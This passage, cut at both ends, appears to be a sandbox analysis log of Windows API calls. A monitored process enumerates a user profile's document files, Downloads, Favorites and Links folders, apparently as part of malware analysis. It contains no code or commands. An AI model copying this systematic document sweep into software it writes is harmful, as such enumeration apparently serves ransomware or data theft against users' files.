lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce657080, ftCreationTime.dwHighDateTime=0x1d5e069, ftLastAccessTime.dwLowDateTime=0xe2e8b760, ftLastAccessTime.dwHighDateTime=0x1d5df1f, ftLastWriteTime.dwLowDateTime=0xe2e8b760, ftLastWriteTime.dwHighDateTime=0x1d5df1f, nFileSizeHigh=0x0, nFileSizeLow=0xb847, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dLM76_.ods", cAlternateFileName="")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13db88f0, ftCreationTime.dwHighDateTime=0x1d5db0d, ftLastAccessTime.dwLowDateTime=0x130d9bc0, ftLastAccessTime.dwHighDateTime=0x1d5d806, ftLastWriteTime.dwLowDateTime=0x130d9bc0, ftLastWriteTime.dwHighDateTime=0x1d5d806, nFileSizeHigh=0x0, nFileSizeLow=0x15109, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HG1yd7 ZbRQ4uo.pps", cAlternateFileName="HG1YD7~1.PPS")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f02010, ftCreationTime.dwHighDateTime=0x1d5ca39, ftLastAccessTime.dwLowDateTime=0x67c328a0, ftLastAccessTime.dwHighDateTime=0x1d56f8e, ftLastWriteTime.dwLowDateTime=0x67c328a0, ftLastWriteTime.dwHighDateTime=0x1d56f8e, nFileSizeHigh=0x0, nFileSizeLow=0x9237, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HoP8JuRK0HNBv2.xlsx", cAlternateFileName="HOP8JU~1.XLS")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7553d10, ftCreationTime.dwHighDateTime=0x1d5d9c5, ftLastAccessTime.dwLowDateTime=0x5a2a03d0, ftLastAccessTime.dwHighDateTime=0x1d5e405, ftLastWriteTime.dwLowDateTime=0x5a2a03d0, ftLastWriteTime.dwHighDateTime=0x1d5e405, nFileSizeHigh=0x0, nFileSizeLow=0x16af8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IJTTRqOwgt1VbJ2Kp8.ods", cAlternateFileName="IJTTRQ~1.ODS")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe945e790, ftCreationTime.dwHighDateTime=0x1d5d93e, ftLastAccessTime.dwLowDateTime=0xc6010890, ftLastAccessTime.dwHighDateTime=0x1d5e42f, ftLastWriteTime.dwLowDateTime=0xc6010890, ftLastWriteTime.dwHighDateTime=0x1d5e42f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ix26jPfYt", cAlternateFileName="IX26JP~1")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4871d680, ftCreationTime.dwHighDateTime=0x1d55ab8, ftLastAccessTime.dwLowDateTime=0x226da310, ftLastAccessTime.dwHighDateTime=0x1d56fb2, ftLastWriteTime.dwLowDateTime=0x226da310, ftLastWriteTime.dwHighDateTime=0x1d56fb2, nFileSizeHigh=0x0, nFileSizeLow=0x10c01, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lBalfJLtxdu1Jt.pptx", cAlternateFileName="LBALFJ~1.PPT")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x527be600, ftCreationTime.dwHighDateTime=0x1d5e7eb, ftLastAccessTime.dwLowDateTime=0xab1f5e30, ftLastAccessTime.dwHighDateTime=0x1d5e3f5, ftLastWriteTime.dwLowDateTime=0xab1f5e30, ftLastWriteTime.dwHighDateTime=0x1d5e3f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ljrmjeDV", cAlternateFileName="")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10ca3a00, ftCreationTime.dwHighDateTime=0x1d57bc5, ftLastAccessTime.dwLowDateTime=0x23595840, ftLastAccessTime.dwHighDateTime=0x1d56883, ftLastWriteTime.dwLowDateTime=0x23595840, ftLastWriteTime.dwHighDateTime=0x1d56883, nFileSizeHigh=0x0, nFileSizeLow=0x819f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mCJwzT3y-aSI2khkOSa.pptx", cAlternateFileName="MCJWZT~1.PPT")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0142.989] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0142.990] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0142.990] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0142.990] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d60db0, ftCreationTime.dwHighDateTime=0x1d5be39, ftLastAccessTime.dwLowDateTime=0x5c4967d0, ftLastAccessTime.dwHighDateTime=0x1d5a3cf, ftLastWriteTime.dwLowDateTime=0x5c4967d0, ftLastWriteTime.dwHighDateTime=0x1d5a3cf, nFileSizeHigh=0x0, nFileSizeLow=0x105f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pCWMDifKeN5xB.docx", cAlternateFileName="PCWMDI~1.DOC")) returned 1 [0142.990] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a42d600, ftCreationTime.dwHighDateTime=0x1d55c78, ftLastAccessTime.dwLowDateTime=0xb66d00f0, ftLastAccessTime.dwHighDateTime=0x1d5e0bf, ftLastWriteTime.dwLowDateTime=0xb66d00f0, ftLastWriteTime.dwHighDateTime=0x1d5e0bf, nFileSizeHigh=0x0, nFileSizeLow=0x923b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="slswT8.docx", cAlternateFileName="SLSWT8~1.DOC")) returned 1 [0142.990] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75d5d500, ftCreationTime.dwHighDateTime=0x1d5a030, ftLastAccessTime.dwLowDateTime=0xfaef2880, ftLastAccessTime.dwHighDateTime=0x1d5abb7, ftLastWriteTime.dwLowDateTime=0xfaef2880, ftLastWriteTime.dwHighDateTime=0x1d5abb7, nFileSizeHigh=0x0, nFileSizeLow=0xeb57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="so _w3b.pptx", cAlternateFileName="SO_W3B~1.PPT")) returned 1 [0142.990] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x313a0d40, ftCreationTime.dwHighDateTime=0x1d5e265, ftLastAccessTime.dwLowDateTime=0xac8097f0, ftLastAccessTime.dwHighDateTime=0x1d5d999, ftLastWriteTime.dwLowDateTime=0xac8097f0, ftLastWriteTime.dwHighDateTime=0x1d5d999, nFileSizeHigh=0x0, nFileSizeLow=0x90b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="u4Rr7llR73jzC.docx", cAlternateFileName="U4RR7L~1.DOC")) returned 1 [0142.990] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f1a2f0, ftCreationTime.dwHighDateTime=0x1d58897, ftLastAccessTime.dwLowDateTime=0xd9b67ad0, ftLastAccessTime.dwHighDateTime=0x1d56c86, ftLastWriteTime.dwLowDateTime=0xd9b67ad0, ftLastWriteTime.dwHighDateTime=0x1d56c86, nFileSizeHigh=0x0, nFileSizeLow=0xac20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UimKcEmcr.xlsx", cAlternateFileName="UIMKCE~1.XLS")) returned 1 [0142.990] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffa93620, ftCreationTime.dwHighDateTime=0x1d5e5f7, ftLastAccessTime.dwLowDateTime=0xca2b4680, ftLastAccessTime.dwHighDateTime=0x1d5bdbd, ftLastWriteTime.dwLowDateTime=0xca2b4680, ftLastWriteTime.dwHighDateTime=0x1d5bdbd, nFileSizeHigh=0x0, nFileSizeLow=0xdda2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uTfSpOH2kHDjRl_Mlqpx.docx", cAlternateFileName="UTFSPO~1.DOC")) returned 1 [0142.990] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fc04a00, ftCreationTime.dwHighDateTime=0x1d5d7fb, ftLastAccessTime.dwLowDateTime=0xbf0519c0, ftLastAccessTime.dwHighDateTime=0x1d5e612, ftLastWriteTime.dwLowDateTime=0xbf0519c0, ftLastWriteTime.dwHighDateTime=0x1d5e612, nFileSizeHigh=0x0, nFileSizeLow=0x1135d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VzHKGiuUmJdZNB5P.odp", cAlternateFileName="VZHKGI~1.ODP")) returned 1 [0142.990] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1c03750, ftCreationTime.dwHighDateTime=0x1d5e6b0, ftLastAccessTime.dwLowDateTime=0x48edea20, ftLastAccessTime.dwHighDateTime=0x1d5e57a, ftLastWriteTime.dwLowDateTime=0x48edea20, ftLastWriteTime.dwHighDateTime=0x1d5e57a, nFileSizeHigh=0x0, nFileSizeLow=0x14af8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x4CpRECto9t_p3.xlsx", cAlternateFileName="X4CPRE~1.XLS")) returned 1 [0142.990] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53bb4750, ftCreationTime.dwHighDateTime=0x1d584e4, ftLastAccessTime.dwLowDateTime=0x9fde61c0, ftLastAccessTime.dwHighDateTime=0x1d55d17, ftLastWriteTime.dwLowDateTime=0x9fde61c0, ftLastWriteTime.dwHighDateTime=0x1d55d17, nFileSizeHigh=0x0, nFileSizeLow=0x12707, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ylc9KdY-lbsxbVce6G.pptx", cAlternateFileName="YLC9KD~1.PPT")) returned 1 [0142.990] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd71f2320, ftCreationTime.dwHighDateTime=0x1d5dadc, ftLastAccessTime.dwLowDateTime=0x2b161ce0, ftLastAccessTime.dwHighDateTime=0x1d5dc0e, ftLastWriteTime.dwLowDateTime=0x2b161ce0, ftLastWriteTime.dwHighDateTime=0x1d5dc0e, nFileSizeHigh=0x0, nFileSizeLow=0x43da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZNR6xVP AY2Y2JMin.odp", cAlternateFileName="ZNR6XV~1.ODP")) returned 1 [0142.990] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd71f2320, ftCreationTime.dwHighDateTime=0x1d5dadc, ftLastAccessTime.dwLowDateTime=0x2b161ce0, ftLastAccessTime.dwHighDateTime=0x1d5dc0e, ftLastWriteTime.dwLowDateTime=0x2b161ce0, ftLastWriteTime.dwHighDateTime=0x1d5dc0e, nFileSizeHigh=0x0, nFileSizeLow=0x43da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZNR6xVP AY2Y2JMin.odp", cAlternateFileName="ZNR6XV~1.ODP")) returned 0 [0142.990] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b700 | out: hHeap=0x620000) returned 1 [0142.990] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.990] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0142.990] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.990] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.990] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.990] PathFindFileNameW (pszPath="") returned="" [0142.990] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0142.991] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.991] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0142.991] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0142.991] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b700 | out: hHeap=0x620000) returned 1 [0142.991] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.991] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0142.991] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.991] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.991] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.991] PathFindFileNameW (pszPath="") returned="" [0142.991] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0142.992] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.992] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0142.992] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0142.992] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0142.992] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0142.992] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0142.992] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0142.992] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b700 | out: hHeap=0x620000) returned 1 [0142.992] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.992] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0142.992] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.992] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.992] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.992] PathFindFileNameW (pszPath="") returned="" [0142.992] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d170 | out: hHeap=0x620000) returned 1 [0142.993] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, 